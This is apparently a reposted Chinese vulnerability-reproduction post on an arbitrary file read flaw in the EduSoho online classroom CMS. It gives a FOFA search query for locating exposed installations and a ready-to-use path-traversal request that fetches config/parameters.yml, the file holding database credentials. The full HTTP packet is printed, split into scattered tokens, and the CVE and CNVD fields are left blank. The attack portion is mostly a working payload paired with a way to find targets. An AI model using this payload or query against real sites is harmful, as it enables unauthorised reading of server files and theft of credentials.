免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. Edusoho网络课堂cms简介
Edusoho网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。
2.漏洞描述
Edusoho网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。Edusoho网络课堂存在任意文件读取漏洞
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
Edusoho网络课堂cms
4.fofa查询语句
title="EduSoho"
5.漏洞复现
漏洞链接:https://127.0.0.1/export/classroom-course-statistics?fileNames[]=../../../config/parameters.yml
漏洞数据包:
GET
/
export
/
classroom
-
course
-
statistics
?
fileNames
[]=../../../
config
/
parameters
.
yml HTTP
/
1.1
Host
:
127.0
.
0.1
User
-
Agent
:
Mozilla
/
5.0
(
Macintosh
;
Intel
Mac
OS X
10
_15_7
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
120.0
.
0.0
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,*
/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: Keep-Alive
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=6hjpl1c6pvu8i0uln8cr6niv77
Upgrade-Insecure-Requests: 127
原文始发于微信公众号(南风漏洞复现文库):Edusoho网络课堂cms存在任意文件读取漏洞 附POC软件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论